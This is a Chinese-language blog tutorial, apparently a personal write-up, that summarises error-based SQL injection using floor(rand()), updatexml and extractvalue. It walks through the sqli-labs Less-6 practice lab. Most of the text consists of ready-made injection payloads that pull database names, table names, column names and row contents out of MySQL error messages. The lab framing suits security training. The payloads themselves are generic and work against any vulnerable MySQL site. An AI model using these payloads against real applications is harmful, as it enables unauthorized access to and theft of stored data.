SQL报错注入是一种常见的SQL注入攻击方式,攻击者通过注入恶意代码,触发数据库的错误响应,并从错误信息中获取有用的信息。
下面介绍最常见的三个报错注入函数用法及payload总结:
1、floor()
使用floor报错注入,需要确保查询的表必须大于三条数据
payload的大致格式
'union select 1 from (select count(*),concat((slelect语句),floor(rand(0)*2))x from "一个足够大的表" group by x)a--+
本质是因为floor(rand(0)*2)的重复性,导致group by语句出错。
来到sqllabs-Less-6
简单测试一下:
输入一个存在的id,正常回显
data:image/s3,"s3://crabby-images/eb634/eb634674e616109f8a70faf32d4138f4f16f6b1d" alt=""
输入不存在的id,无任何回显
data:image/s3,"s3://crabby-images/c9dcd/c9dcd281947f762116d04975120261cbc7d23d5e" alt=""
找闭合点,为双引号
data:image/s3,"s3://crabby-images/e1f15/e1f15a31028da171585defb3c932eb00cda80ef0" alt=""
但是这里回显要么存在,要么无回显,因此无法使用联合查询注入,而且也不存在回显为真或者假两种情况,排除掉盲注,那么这关需要使用的是报错注入。
首先我们查当前数据库名
足够大的表那肯定就是information_schema.tables,这个表里包含了所有的表
当然也可以用information_schema.columns,包含了所有的列
?id=1" and (select 1 from (select count(*),concat(0x23,(database()),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
说明:这里的0x23即16进制的23,转换为ASCII字符为 #,主要是便于我们对查询结果的观察
data:image/s3,"s3://crabby-images/f117e/f117e2ff349ebebc4e1cb27ae474cbfa53c3ae7d" alt=""
可以得到当前数据库名为 security
我们也可以查其他数据库名
将上述payload的database()换成对应查询语句即可
?id=1" and (select 1 from (select count(*),concat(0x23,(select schema_name from information_schema.schemata limit 0,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group BY x) as y)--+
data:image/s3,"s3://crabby-images/a2381/a2381b5274aaa810d4f31d3d5aff2de784c398b1" alt=""
修改limit语句的参数即可查询到不同的数据库名
接下来我们查security数据库下的表名
?id=1" and (select 1 from (select count(*),concat(0x23,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
data:image/s3,"s3://crabby-images/2056f/2056fd04ad302817d73a7de96214486907ac737d" alt=""
可以看到security数据库下的第一个表为 emails
对照本地,即可验证
data:image/s3,"s3://crabby-images/964f0/964f03222ba5270013da95e0a53c01a87896380d" alt=""
同样修改limit语句的参数值从而查询其他的表名
比如
?id=1" and (select 1 from (select count(*),concat(0x23,(select table_name from information_schema.tables where table_schema='security' limit 2,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
data:image/s3,"s3://crabby-images/870cf/870cfe25be418e134f89fc7d37d394a575c3d0d9" alt=""
其实有时候我们可以使用group_concat()将所以查询内容列出,但是要取决于题目具体环境,如果无法使用,则使用limit语句来限制查询结果的列数,逐条查询。
之后我们查询指定数据库指定表名下的列名
?id=1" and (select 1 from (select count(*),concat(0x23,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
第一列名为 id
data:image/s3,"s3://crabby-images/b4de7/b4de7c2bcf0ffdc5b04f324f7b5b8e2b6225932c" alt=""
继续查下一列的列名
?id=1" and (select 1 from (select count(*),concat(0x23,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 1,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
data:image/s3,"s3://crabby-images/dac83/dac83ff0848630c165df9b7ec26c4134673fc743" alt=""
得知第二列的列名为 email_id
最后则是查具体字段内容,这里我们查询 email_id 下的内容
?id=1" and (select 1 from (select count(*),concat(0x23,(select email_id from security.emails limit 0,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
data:image/s3,"s3://crabby-images/52abb/52abb58638d15c7d73ddf0a546144f68a1cf4d61" alt=""
查第二行数据
?id=1" and (select 1 from (select count(*),concat(0x23,(select email_id from security.emails limit 1,1),0x23,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
data:image/s3,"s3://crabby-images/11e15/11e154e030f1afc77230b56d3fccae0a22b987ae" alt=""
以此类推
将查询结果与本地靶场数据库对比,信息一致
data:image/s3,"s3://crabby-images/9a537/9a53775e2c3f7935a69c86bda49e8fbf6ff929bd" alt=""
2、extractvalue 和 updatexml
从 mysql5.1.5 开始,提供两个 XML 查询和修改的函数:extractvalue 和 updatexml。extractvalue 负责在 xml 文档中按照 xpath 语法查询节点内容,updatexml 则负责修改查询到的内容。
用法上extractvalue与updatexml的区别:updatexml使用三个参数,extractvalue只有两个参数。
它们的第二个参数都要求是符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里。
'~'不是xml实体,所以会报错
concat()函数:用于拼接字符串
这里也给出payload
查数据库名
?id=1" and (select updatexml(1,concat(0x23,(select database())),0x23))--+
data:image/s3,"s3://crabby-images/0e4a0/0e4a0338830811eda8bc57cb1649e6e7183994e4" alt=""
查表名
这里使用group_concat直接列完
说明:#可以换成~、$等不满足 xpath 格式的字符
下面讲0x23换成了0x7e,即将#换成了~
可以就用database(),也可以具体指定为security
?id=1" and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))--+
data:image/s3,"s3://crabby-images/58f8c/58f8c446f444d2af10534d8253623f5385e0cfd3" alt=""
查列名
?id=1" and (select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='emails')),0x7e))--+
data:image/s3,"s3://crabby-images/c52e1/c52e10e9d930fcd4b98e210b43bbdb85e46e0112" alt=""
查具体字段内容
?id=1" and (select updatexml(1,concat(0x7e,(select group_concat(email_id)from security.emails)),0x7e))--+
data:image/s3,"s3://crabby-images/834eb/834ebd0c6651d1e2b0bebce54eb40fa3a60a0279" alt=""
对于extractvalue()则只写两个参数
extractvalue() 能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要用 substring() 函数截取或 limit 分页,一次查看最多 32 位。
查数据库名
?id=1" and(select extractvalue(1,concat(0x7e,(select database()))))--+
data:image/s3,"s3://crabby-images/b3a00/b3a00dac215a037887a544c883c17107d7b6abbd" alt=""
查表名
?id=1" and (select extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'))))--+
data:image/s3,"s3://crabby-images/6146a/6146a5cd4692ad19db0b9f30a7633f941f967c1f" alt=""
查列名
?id=1" and (select extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='emails'))))--+
data:image/s3,"s3://crabby-images/1d170/1d170c7454713bd7057725b8e71114c2989000fd" alt=""
查字段内容
?id=1" and (select extractvalue(1,concat(0x7e,(select group_concat(email_id)from security.emails))))--+
data:image/s3,"s3://crabby-images/9b295/9b295a0cb176e2ad1c2e8263eba656a9129fbaad" alt=""
换句话说,extractvalue的payload就是将updatexml的函数名替换,再删掉第三个参数即可。
以上就是关于最常见的三种报错注入函数及方法和payload的总结。
创作不易,喜欢的可以点赞支持关注一下!